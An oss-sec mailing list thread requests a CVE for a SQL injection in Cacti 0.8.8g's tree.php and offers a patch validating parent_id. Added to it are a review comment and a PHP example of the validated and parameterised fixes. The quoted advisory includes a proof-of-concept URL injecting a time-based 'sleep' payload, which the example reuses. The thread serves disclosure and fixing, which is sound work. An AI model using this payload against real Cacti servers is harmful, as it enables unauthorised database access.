oss-sec mailing list archives

Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability


From: Tim Zingelman <tez () pkgsrc org>
Date: Tue, 15 Mar 2016 15:27:05 -0500

This seems to fix it...

diff -u tree.php.orig tree.php
--- tree.php.orig       2016-03-15 15:15:37.646641203 -0500
+++ tree.php    2016-03-15 15:19:45.966120414 -0500
@@ -153,6 +153,7 @@
        /* ================= input validation ================= */
        input_validate_input_number(get_request_var("id"));
        input_validate_input_number(get_request_var("tree_id"));
+       input_validate_input_number(get_request_var("parent_id"));
        /* ==================================================== */

        if (!empty($_GET["id"])) {
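Review bot: the new check validates parent_id only at the top of the file, while the query at line 208 (quoted below in the advisory) still splices the raw `$_GET["parent_id"]` into the SQL string, so the fix holds only if every path to that query first passes through this validation block; for defence in depth, cast or validate at the point of use too, e.g. `where id=" . (int)$_GET["parent_id"]`. The hunk also says nothing about an absent or empty parent_id: with nothing after `where id=` the query is still malformed, so consider requiring a non-empty value before it is used.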



On Thu, Mar 10, 2016 at 10:06 AM, Paul Gevers <elbrus () debian org> wrote:
Hi

I just found the description below about an sql vulnerability in the
cacti bug tracker: http://bugs.cacti.net/view.php?id=2667

Can a CVE be assigned for this issue?
Thanks

==========================
Advisory: Cacti SQL Injection Vulnerability
Author: Do9gy of Tencent Security Platform Department
Affected Version: 0.8.8g (the latest version and older versions)
==========================
Vulnerability Description
==========================

Recently, I found a SQL Injection Vulnerability in 'Cacti-0.8.8g'.
Cacti is widely used in many companies.
Vulnerable file: /cacti/tree.php:
line 208:
==========================================================================================================================================
    switch ($current_type) {
    case TREE_ITEM_TYPE_HEADER:
        $i = 0;
        /* it's nice to default to the parent sorting style for new items */
        if (empty($_GET["id"])) {
            $default_sorting_type = db_fetch_cell("select sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]);
        }else{
            $default_sorting_type = TREE_ORDERING_NONE;
        }

==========================================================================================================================================

The parameter parent_id is used without any validation.
==========================
POC && EXP
==========================
1. Login

2.
http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1)

3. mysql log: select sort_children_type from graph_tree_items where id=8 and sleep(1)
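The pattern behind the bug, and the two ways of closing it, as an added example that is not Cacti code and not part of the advisory or the patch above. `validate_number()` is a hypothetical stand-in for Cacti's `input_validate_input_number()` (that function's exact behaviour is not shown on this page); `build_query_vulnerable()`, `build_query_validated()` and `fetch_sort_type()` are names chosen here, and an in-memory SQLite database stands in for Cacti's MySQL backend so the script runs offline.

```php
<?php
// Added example, not Cacti code: contrasts the unvalidated concatenation
// from tree.php with a validated build and a parameterised query.

// Hypothetical stand-in for Cacti's input_validate_input_number(): accept
// only a plain decimal integer, reject everything else (including empty).
function validate_number(string $value): string {
    if (!preg_match('/^[0-9]+$/', $value)) {
        throw new InvalidArgumentException("non-numeric input: $value");
    }
    return $value;
}

// Vulnerable pattern: the request parameter is spliced into the SQL text,
// so whatever follows the number becomes part of the WHERE clause.
function build_query_vulnerable(array $get): string {
    return "select sort_children_type from graph_tree_items where id=" . $get["parent_id"];
}

// Fix 1, what the patch does: validate before the value reaches the query.
function build_query_validated(array $get): string {
    $parent_id = validate_number($get["parent_id"] ?? '');
    return "select sort_children_type from graph_tree_items where id=" . $parent_id;
}

// Fix 2: a prepared statement with a typed bound parameter, so the value
// is never interpreted as SQL text at all. Validation is kept as well.
function fetch_sort_type(PDO $db, string $parent_id): ?string {
    $stmt = $db->prepare("select sort_children_type from graph_tree_items where id = ?");
    $stmt->bindValue(1, (int) validate_number($parent_id), PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetchColumn();
    return $row === false ? null : (string) $row;
}

// Constructed demo input: the payload from the advisory's PoC URL.
$payload = "8 and sleep(1)";

echo build_query_vulnerable(["parent_id" => $payload]), "\n";
// attacker-controlled WHERE clause: ... where id=8 and sleep(1)

try {
    build_query_validated(["parent_id" => $payload]);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Stand-in database (needs the pdo_sqlite extension) with one constructed row.
$db = new PDO('sqlite::memory:');
$db->exec("create table graph_tree_items (id integer primary key, sort_children_type integer)");
$db->exec("insert into graph_tree_items values (8, 1)");

var_dump(fetch_sort_type($db, "8"));   // legitimate id: string(1) "1"
try {
    fetch_sort_type($db, $payload);    // same payload never reaches the database
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Run it with `php example.php`. The vulnerable builder prints the exact query the advisory observed in the MySQL log; both hardened forms reject the payload before any SQL is executed, and the prepared statement would stay safe even if the validation were missing, because the bound integer cannot alter the statement's structure.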


